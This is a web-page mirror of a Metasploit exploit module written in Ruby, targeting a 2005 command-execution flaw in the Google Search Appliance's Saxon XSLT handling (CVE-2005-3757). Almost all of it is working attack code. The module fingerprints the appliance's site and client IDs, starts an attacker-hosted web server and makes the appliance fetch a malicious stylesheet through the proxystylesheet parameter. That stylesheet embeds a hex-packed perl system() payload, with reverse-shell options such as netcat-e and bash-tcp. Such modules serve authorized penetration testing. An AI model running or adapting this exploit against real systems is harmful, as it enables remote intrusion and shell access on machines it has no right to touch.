Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
19812 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8
  include Msf::Exploit::Remote::HttpClient

9
  include Msf::Exploit::Remote::HttpServer

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Google Appliance ProxyStyleSheet Command Execution',

16
        'Description' => %q{

17
          This module exploits a feature in the Saxon XSLT parser used by

18
          the Google Search Appliance. This feature allows for arbitrary

19
          java methods to be called. Google released a patch and advisory to

20
          their client base in August of 2005 (GA-2005-08-m). The target appliance

21
          must be able to connect back to your machine for this exploit to work.

22
        },

23
        'Author' => [ 'hdm' ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          ['CVE', '2005-3757'],

27
          ['OSVDB', '20981'],

28
          ['BID', '15509'],

29
        ],

30
        'Privileged' => false,

31
        'Payload' => {

32
          'DisableNops' => true,

33
          'Space' => 4000,

34
          'Compat' =>

35
                        {

36
                          'PayloadType' => 'cmd cmd_bash',

37
                          'RequiredCmd' => 'generic perl bash-tcp telnet netcat netcat-e',

38
                        }

39
        },

40
        'Platform' => 'unix',

41
        'Arch' => ARCH_CMD,

42
        'Targets' => [[ 'Automatic', {}]],

43
        'DisclosureDate' => '2005-08-16',

44
        'Stance' => Msf::Exploit::Stance::Aggressive,

45
        'DefaultTarget' => 0,

46
        'Notes' => {

47
          'Reliability' => UNKNOWN_RELIABILITY,

48
          'Stability' => UNKNOWN_STABILITY,

49
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

50
        }

51
      )

52
    )

53
  end

54


55
  # Handle incoming requests from the appliance

56
  def on_request_uri(cli, request)

57
    print_status("Handling new incoming HTTP request...")

58


59
    exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack("H*")[0] + '}))'

60
    data = @xml_data.gsub(/:x:MSF:x:/, exec_str)

61
    send_response(cli, data)

62
  end

63


64
  def autofilter

65
    true

66
  end

67


68
  def check

69
    res = send_request_cgi({

70
      'uri' => '/search',

71
      'vars_get' =>

72
      {

73
        'client' => rand_text_alpha(rand(15) + 1),

74
        'site' => rand_text_alpha(rand(15) + 1),

75
        'output' => 'xml_no_dtd',

76
        'q' => rand_text_alpha(rand(15) + 1),

77
        'proxystylesheet' => 'http://' + rand_text_alpha(rand(15) + 1) + '/'

78
      }

79
    }, 10)

80


81
    if (res and res.body =~ /cannot be resolved to an ip address/)

82
      vprint_status("This system appears to be vulnerable")

83
      return Exploit::CheckCode::Appears

84
    end

85


86
    if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/)

87
      vprint_status("This system appears to be patched")

88
    end

89


90
    return Exploit::CheckCode::Safe

91
  end

92


93
  def exploit

94
    # load the xml data

95
    path = File.join(Msf::Config.data_directory, "exploits", "google_proxystylesheet.xml")

96
    fd = File.open(path, "rb")

97
    @xml_data = fd.read(fd.stat.size)

98
    fd.close

99


100
    print_status("Obtaining the appliance site and client IDs...")

101
    # Send a HTTP/1.0 request to learn the site configuration

102
    res = send_request_raw({

103
      'uri' => '/',

104
      'version' => '1.0'

105
    }, 10)

106


107
    if !(res and res['location'] and res['location'] =~ /site=/)

108
      print_status("Could not read the location header: #{res.code} #{res.message}")

109
      return

110
    end

111


112
    m = res['location'].match(/site=([^\&]+)\&.*client=([^\&]+)\&/im)

113
    if !(m and m[1] and m[2])

114
      print_status("Invalid location header: #{res['location']}")

115
      return

116
    end

117


118
    print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")

119
    start_service

120


121
    print_status("Requesting a search using our custom XSLT...")

122
    res = send_request_cgi({

123
      'uri' => '/search',

124
      'vars_get' =>

125
      {

126
        'client' => m[2],

127
        'site' => m[1],

128
        'output' => 'xml_no_dtd',

129
        'q' => rand_text_alpha(rand(15) + 1),

130
        'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",

131
        'proxyreload' => '1'

132
      }

133
    }, 25)

134


135
    if (res)

136
      print_status("The server returned: #{res.code} #{res.message}")

137
      print_status("Waiting on the payload to execute...")

138
      select(nil, nil, nil, 20)

139
    else

140
      print_status("No response from the server")

141
    end

142
  end

143
end

144


145